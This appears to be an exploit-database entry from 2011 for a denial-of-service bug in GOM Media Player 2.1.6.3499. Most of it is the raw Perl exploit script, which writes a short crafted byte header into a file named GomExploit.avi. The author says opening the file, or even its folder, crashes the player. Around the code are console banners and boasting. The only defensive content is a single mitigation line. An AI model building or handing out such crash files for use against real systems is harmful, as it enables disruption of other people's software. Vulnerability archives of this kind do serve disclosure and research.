GOM Media Player 2.1.6.3499 0day Buffer overflow/DOS Exploit

vendor:

GOM Media Player

by:

^Xecuti0N3r

5.5

CVSS

MEDIUM

Buffer overflow/DOS

CWE

Product Name: GOM Media Player

Affected Version From: 2.1.6.3499

Affected Version To: 2.1.6.3499

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3

2011

GOM Media Player 2.1.6.3499 0day Buffer overflow/DOS Exploit

This exploit takes advantage of a buffer overflow vulnerability in GOM Media Player version 2.1.6.3499. It generates a malicious avi file that, when opened with GOM Player, can cause a crash or denial of service.

Mitigation:

Update GOM Media Player to the latest version to mitigate this vulnerability. Avoid opening avi files from untrusted sources.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#(+)Exploit Title: GOM Media Player 2.1.6.3499 0day Buffer overflow/DOS Exploit
#(+)Software Link: download.cnet.com/GOM-Media-Player/3000-2139_4-10701768.html
#(+)Software  : GOM Media Player
#(+)Version   : 2.1.6.3499
#(+)Tested On : WIN-XP SP3
#(+) Date     : 31.03.2011
#(+) Hour     : 3:37 PM
#Similar Bug was found by cr4wl3r in MediaPlayer Classic

system("color 6");
system("title GOM Media Player 2.1.6.3499 0day Buffer overflow/DOS Exploit");
print "
_______________________________________________________________________
																	
(+)Exploit Title: GOM Media Player 2.1.6.3499 0day Buffer overflow/DOS Exploit
 
(+) Software Link: download.cnet.com/GOM-Media-Player/3000-2139_4-10701768.html					
(+) Software  : GOM Media Player
(+) Version   : 2.1.6.3499												
(+) Tested On : WIN-XP SP3												
(+) Date      : 31.03.2011												
(+) Hour      : 13:37 PM													
____________________________________________________________________\n	";
sleep 2;
system("cls");
system("color 2");
print "\nGenerating the exploit file !!!";
sleep 2;
print "\n\nGomExploit.avi file generated!!";
sleep 2;
$theoverflow = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
 
open(file, "> GomExploit.avi");
print (file $theoverflow);
print "\n\n(+) Done!\n
(+) Now Just open GomExplot.avi with Gom Player and Kaboooommm !! ;) \n
(+) Most of the times there is a crash\n whenever you open the folder where the GomExploit.avi is stored :D \n";

sleep 3;
system("cls");
sleep 1;
system("color C");
print "\n\n\n########################################################################\n
(+)Exploit Coded by: ^Xecuti0N3r\n
(+)^Xecuti0N3r: E-mail \n
(+)d3M0l!tioN3r: E-mail \n
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r & aNnIh!LatioN3r \n
########################################################################\n\n";
system("pause");